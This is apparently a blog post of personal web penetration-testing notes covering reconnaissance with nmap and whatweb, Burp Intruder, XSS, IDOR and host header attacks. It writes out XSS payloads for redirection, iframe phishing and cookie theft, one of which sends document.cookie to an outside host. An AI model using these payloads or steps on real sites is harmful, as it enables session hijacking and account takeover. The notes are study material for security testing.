Information gathering:
1. site
2. subdomains -> virustotal.com
3. IP address -> ping any.com
4. Find the programming language of the website:
Google Search – site:any.com .jsp/aspx/php/asp/jspx...
Kali – whatweb any.com (and find X-Powered-By)
5. Open ports and Services:
nmap domain/ip
nmap ip -Pn (if ping probe is blocked by normal scan)
aggressive scan: nmap ip -sV (if blocking, append in last -Pn)
Detailed scan: nmap ip | nmap -sC ip
6. Servers info:
whatweb any.com or ssltest.com (in signature many more things)
intruder in burpsuite :
Attack type :– Sniper – (will apply payload on single parameter where payload apply)
Battering Ram – (One payload will apply in on the parameters)
upload payload and check for 200 status after browsing <- checked URL encoding
<- Uncheck URL encoding
XSS:
prompt.ml -> A website to test XSS with different challenges/payloads
Find parameter which is reflecting back –> test it manually or upload payload through the intruder
By intruder and loaded payload -> on 0 payloads, if it gets executed the length is small so the attacked payload will have a length greater than 0. or it may exist on lower length as well.
URL redirection -> <script>document.location.href=”http://bing.com”</script>
Phishing: <iframe src=”http://bing.com”><iframe>
cookie stealing: <script>alert(document.cookie)</script>
<script>document.location.href=”http://bing.com/p/?page =”+document.cookie</script>
Through File uploading -> if file upload option is available and file name is visible in source code after uploading(file name is reflecting) then it may be XSS. Apply payload of XSS on the name of file and check.
IDOR – Insecure Direct Object Reference
Login by account A. -> Edit Profile A. -> Capture User ID , suppose - abcd
Login by Account B -> Edit profile B -> pass used ID of A here and forward. -> Now check the changes in account A
User reference can be changed at URL
Host Header Attack: Open Redirection
Check the status code = 200, 201,202..or 300, 301,..(2XX or 3XX)
Below the get method:
1. Now capture the request -> Host: replace the real website to testing website like bing.com
If it is redirecting to the bing.com then there is a host header attack.
2. change realweb.com to bing.com and set X-Forwarded-Host to realweb.com
like – Host: bing.com
X-Forwarded-Host: realweb.com
3. Vice-versa of 2nd point
Host Header Attack: Web Cache Poising
4. Change the Host similar as above - Host: bing.com
In response, if it is visible in href: bing.com then there is web cache poising
In the browser, the response will be as a link. When it will be clicked on UI, it will redirect to bing.com
Host Header Attack: Password Reset Page
5. Suppose a website is sending password reset link for password reset
An attacker changed the host from this link on mail. Now when the user tries to change the password, this won’t work(host in url is different) but the attacker will get the requested link(password reset link) in the log and he/she can change user’s password by manually changing the url host from that link.
Reference- (These contents are part of notes prepared by me - from multiple sources. Major parts are taken from Vikash Chaudhary course from Udemy(for more details visit this course on Udemy))
Reference- (These contents are part of notes prepared by me - from multiple sources. Major parts are taken from Vikash Chaudhary course from Udemy(for more details visit this course on Udemy))
No comments:
Post a Comment